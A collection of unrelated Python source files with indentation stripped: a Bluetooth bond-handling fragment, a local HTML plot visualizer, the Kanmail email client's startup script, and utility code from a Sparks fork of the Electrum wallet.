if result == 0:
self._stored_bonds.pop()
return result
def _ble_rsp_sm_get_bonds(self, args):
"""
Handles the response for the start of stored bond enumeration. Sets
self._num_bonds to the number of stored bonds.
args -- dictionary containing the number of stored bonds ('bonds'),
"""
self._num_bonds = args['bonds']
log.debug("num bonds = %d", args['bonds'])
|
local_visualizer.py
|
# -*- coding: utf-8 -*-
"""Simple api to visualize the plots in a script.
Motivation
==========
* When moving from an IPython notebook to a script, we lose the diagnostics
of visualizing pandas as tables and matplotlib plots.
* :class:`LocalViz` starts a local http server and creates a html file to
which pandas tables and matplotlib plots can be sent over.
* The html file is dynamically updated for long running scripts.
Usage
=====
Sample Usage::
import logging, sys, numpy as np, pandas as pd, matplotlib.pyplot as plt
import local_visualizer
plt.style.use('fivethirtyeight')
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# Create the local visualizer instance
lviz = local_visualizer.LocalViz(html_file='lviz_test.html', port=9112)
# INFO:root:Starting background server at: http://localhost:9112/.
# INFO:local_visualizer:Click: http://carpediem:9112/lviz_test.html or http://localhost:9112/lviz_test.html # noqa
# Create plots which will be streamed to the html file.
lviz.h3('Matplotlib :o')
lviz.p(
'Wrap your plots in the figure context manager which takes '
'in the kwargs of plt.figure and returns a plt.figure object.',
)
with lviz.figure(figsize=(10, 8)) as fig:
x = np.linspace(-10, 10, 1000)
plt.plot(x, np.sin(x))
plt.title('Sine test')
lviz.hr()
# Visualize pandas dataframes as tables.
lviz.h3('Pandas dataframes')
df = pd.DataFrame({'A': np.linspace(1, 10, 10)})
df = pd.concat(
[df, pd.DataFrame(np.random.randn(10, 4), columns=list('BCDE'))],
axis=1,
)
lviz.write(df)
lviz.close()
Output
======
This starts a HTTPServer and creates a html file which is dynamically updated
each time ``lviz`` is called. See https://i.imgur.com/jjwvAX2.png for the
output of the above commands.
"""
import base64
try:
import BaseHTTPServer
import SimpleHTTPServer
except ModuleNotFoundError: # noqa (Python 3 only)
import http.server as SimpleHTTPServer
import http.server as BaseHTTPServer
import contextlib
import functools
import io
import logging
import os
import socket
import tempfile
import threading
import matplotlib.pyplot as plt
log = logging.getLogger(__name__)
#: The different HTML header levels.
HEADER_LEVELS = range(1, 6)
HTML_BEGIN_BOILERPLATE = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Local Visualizer</title>
<style>
body {
-webkit-font-smoothing: antialiased;
-webkit-text-size-adjust: none;
margin: 50px !important;
font-size:20px;
font-family:Helvetica, sans-serif;
font-weight: 100;
}
table.dataframe {
border-collapse: collapse;
border: none;
}
table.dataframe tr {
border: none;
}
table.dataframe td, table.dataframe th {
margin: 2px;
border: 1px solid white;
padding-left: 0.25em;
padding-right: 0.25em;
}
table.dataframe th:not(:empty) {
background-color: #fec;
text-align: left;
font-weight: 100;
}
table.dataframe tr:nth-child(2) th:empty {
border-left: none;
border-right: 1px dashed #888;
}
table.dataframe td {
border: 2px solid #ccf;
background-color: #f4f4ff;
}
</style>
</head>
<body>
"""
HTML_END_BOILERPLATE = """
</body>
</html>
"""
def validate_lviz_started(method):
"""Decorater for LocalViz methods to ensure the instance has been started.
"""
@functools.wraps(method)
def validated_method(self, *args, **kwargs):
if not self.is_started:
raise RuntimeError(
'{f} was called before LocalViz was started. Please '
'start the visualizer with the `start` method.'.format(
f=method.__name__,
),
)
return method(self, *args, **kwargs)
return validated_method
class LocalViz(object):
"""API for creating a html visualizer for python scripts.
All the public methods of :class:`HtmlGenerator` are also exposed by
this class.
See module docstring for usage.
:ivar html_file: Path to the html file to write to. If the file
exists already it will be overwritten. If ``None`` is passed in,
the class will create a temp file.
:vartype html_file: str or NoneType
:ivar run_server: Whether the server should started in the background.
:vartype run_server: bool
:ivar port: The port at which the server is to be started.
:vartype port: int
:ivar _html_gen: A container for the html generation.
:vartype _html_gen: HtmlGenerator
:ivar is_started: Has the start been called.
:vartype is_started: bool
"""
def __init__(self, lazy=False, html_file=None, run_server=True, port=9111):
"""Constructor.
:param lazy: Whether the server should started and the html file
be created lazily (should call the :meth:`start`, explicitly).
:type lazy: bool
"""
self.html_file = html_file
self.port = port
self.run_server = run_server
self._html_gen = None
self.is_started = False
if not lazy:
self.start()
def start(self):
"""Creates the html file and possibly starts the bgd http server.
Mutates
* ``self.html_file``
* ``self._html_gen``
* ``self.is_started``
"""
if self.run_server:
run_bgd_server(
port=self.port,
host='localhost',
)
if self.html_file:
# Erase and create a new file.
open(self.html_file, 'w').close()
else:
_, self.html_file = tempfile.mkstemp(
dir=os.getcwd(),
suffix='.html',
)
self._html_gen = HtmlGenerator(output_fl=self.html_file)
# Copy over the public functions pf :class:`HtmlGenerator`.
for name in dir(self._html_gen):
if name.startswith('_'):
continue
member = getattr(self._html_gen, name)
if callable(member):
setattr(self, name, member)
log.info(
'Click: http://{hn}:{p}/{fl} or http://{h}:{p}/{fl}'.format(
hn=socket.gethostname(),
h='localhost',
p=self.port,
fl=self.html_file.split('/')[-1],
),
)
self.is_started = True
@validate_lviz_started
def inform_cleanup(self):
"""Informs the user which html file to delete at the end."""
if self.html_file:
log.info(
'After viewing the plots, please delete the '
'file: `{fl}`'.format(fl=self.html_file),
)
@validate_lviz_started
def close(self):
"""Writes the closing html tags to the html file."""
self._html_gen.write(HTML_END_BOILERPLATE)
@validate_lviz_started
def del_html(self):
"""Deletes the generated html file.
.. note:: Mutates ``self.html_file``.
"""
delete_files_silently([self.html_file])
self.html_file = None
class HtmlGenerator(object):
"""A class which updates a html file and exposes API for the same.
The class also exposes the methods ``h1``, ``h2``, ..., ``h6`` for writing
headers.
"""
def __init__(self, output_fl=None):
self.output_fl = output_fl
self.write(HTML_BEGIN_BOILERPLATE)
for lvl in HEADER_LEVELS:
setattr(
self,
'h{lvl}'.format(lvl=lvl),
functools.partial(self.header, level=lvl),
)
def header(self, text, level=4):
"""Creates a header line of given level.
:param text: The html header text.
:type text: str
:param level: The level of the html header.
:type level: int
"""
self.write('<h{lvl}>{text}</h{lvl}>'.format(text=text, lvl=level))
def p(self, text):
"""Writes a paragraph tagged text.
:param text: The html paragraph text.
:type text: str
"""
self.write('<p>{t}</p>'.format(t=text))
def br(self):
"""Inserts a break line in the html file."""
self.write('<br/>')
def hr(self):
"""Inserts a horizontal line wrapped in blank lines in the html file.
"""
self.write('<br/><hr/><br/>')
@contextlib.contextmanager
def figure(self, **figure_kwargs):
"""Context manager as a stand it replacement for ``plt.figure``.
Example usage::
with lviz.figure(figsize=(10, 10)) as fig:
plt.plot(x, y)
plt.title('This is a title')
"""
fig = plt.figure(**figure_kwargs)
fig_fl = io.BytesIO()
yield fig
plt.savefig(fig_fl, format='png')
fig_fl.seek(0)
fig_png = base64.b64encode(fig_fl.getvalue())
fig_png = fig_png.decode('ascii')
self.write(
'<img src="data:image/png;base64,{fig_png}" '
'width="500"><br/>'.format(fig_png=fig_png),
)
fig_fl.close()
def write(self, text_or_df):
"""Appends the text or a pandas df to the output file.
:param text_or_df: The string or the pandas dataframe to be written to
file.
:type text_or_df: str or pandas.DataFrame
"""
if isinstance(text_or_df, str):
text = text_or_df
else:
# Assume it is a pandas dataframe
text = text_or_df.to_html()
with open(self.output_fl, 'a+') as outfile:
outfile.write('{s}\n'.format(s=text))
def run_bgd_server(port, host='localhost'):
"""Creates a simple http server in a daemon thread.
:param host: The host id where the server has to be started,
ex. ``'localhost'``.
:type host: str
:param port: The port where the local server should serve.
:type port: int
:returns: A daemon thread running a simple http server in the background.
:type: threading.Thread
"""
logging.info(
'Starting background server at: '
'http://{h}:{p}/.'.format(h=host, p=port),
)
server = BaseHTTPServer.HTTPServer(
server_address=(host, port),
RequestHandlerClass=SimpleHTTPServer.SimpleHTTPRequestHandler,
)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return thread
def delete_files_silently(files):
"""Deletes a list of files if they exist.
:param files: A list of file paths.
:type files: list of str
"""
for each_file in files:
try:
os.remove(each_file)
except OSError:
pass
|
main.py
|
import sys
from threading import Thread
from time import sleep
import requests
import webview
from kanmail.license import validate_or_remove_license
from kanmail.log import logger
from kanmail.server.app import boot, server
from kanmail.server.mail.folder_cache import (
remove_stale_folders,
remove_stale_headers,
vacuum_folder_cache,
)
from kanmail.settings import get_window_settings
from kanmail.settings.constants import DEBUG, GUI_LIB, SERVER_HOST
from kanmail.version import get_version
from kanmail.window import create_window, destroy_main_window, init_window_hacks
def run_cache_cleanup_later():
sleep(120) # TODO: make this more intelligent?
remove_stale_folders()
remove_stale_headers()
vacuum_folder_cache()
def run_server():
logger.debug(f'Starting server on {SERVER_HOST}:{server.get_port()}')
try:
server.serve()
except Exception as e:
logger.exception(f'Exception in server thread!: {e}')
def monitor_threads(*threads):
while True:
for thread in threads:
if not thread.is_alive():
logger.critical(f'Thread: {thread} died, exiting!')
destroy_main_window()
else:
sleep(0.5)
def run_thread(target):
def wrapper(thread_name):
try:
target()
except Exception as e:
logger.exception(f'Unexpected exception in thread {thread_name}!: {e}')
thread = Thread(
target=wrapper,
args=(target.__name__,),
)
thread.daemon = True
thread.start()
def main():
logger.info(f'\n#\n# Booting Kanmail {get_version()}\n#')
init_window_hacks()
boot()
server_thread = Thread(name='Server', target=run_server)
server_thread.daemon = True
server_thread.start()
run_thread(validate_or_remove_license)
run_thread(run_cache_cleanup_later)
# Ensure the webserver is up & running by polling it
waits = 0
while waits < 10:
try:
response = requests.get(f'http://{SERVER_HOST}:{server.get_port()}/ping')
response.raise_for_status()
except requests.RequestException as e:
logger.warning(f'Waiting for main window: {e}')
sleep(0.1 * waits)
waits += 1
else:
break
else:
logger.critical('Webserver did not start properly!')
sys.exit(2)
create_window(
unique_key='main',
**get_window_settings(),
)
# Let's hope this thread doesn't fail!
monitor_thread = Thread(
name='Thread monitor',
target=monitor_threads,
args=(server_thread,),
)
monitor_thread.daemon = True
monitor_thread.start()
if DEBUG:
sleep(1) # give webpack a second to start listening
# Start the GUI - this will block until the main window is destroyed
webview.start(gui=GUI_LIB, debug=DEBUG)
# Main window closed, cleanup/exit
sys.exit()
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'SPARKS':8, 'mSPARKS':5, 'uSPARKS':2, 'sprites':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['SPARKS', 'mSPARKS', 'uSPARKS', 'sprites'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "SPARKS"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "SPARKS" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Duffs(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " SPARKS"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.sparks.electrum.electrum_sparks'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-sparks'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Sparks-Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-sparks")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-SPARKS")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-SPARKS")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 0 # num fractional decimal places for sprites/kB fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return '%d' % round(fee)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'insight.sparkspay.io': ('http://insight.sparkspay.io/insight/',
{'tx': 'tx/', 'addr': 'address/'}),
'sparkspay.io': ('http://explorer.sparkspay.io/',
{'tx': 'tx/', 'addr': 'addr/'}),
}
testnet_block_explorers = {
'sparkspay.io': ('https://test.insight.sparks.siampm.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'sparkspay.io')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Sparks address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'sparks':
raise Exception("Not a Sparks URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Sparks address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='sparks', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
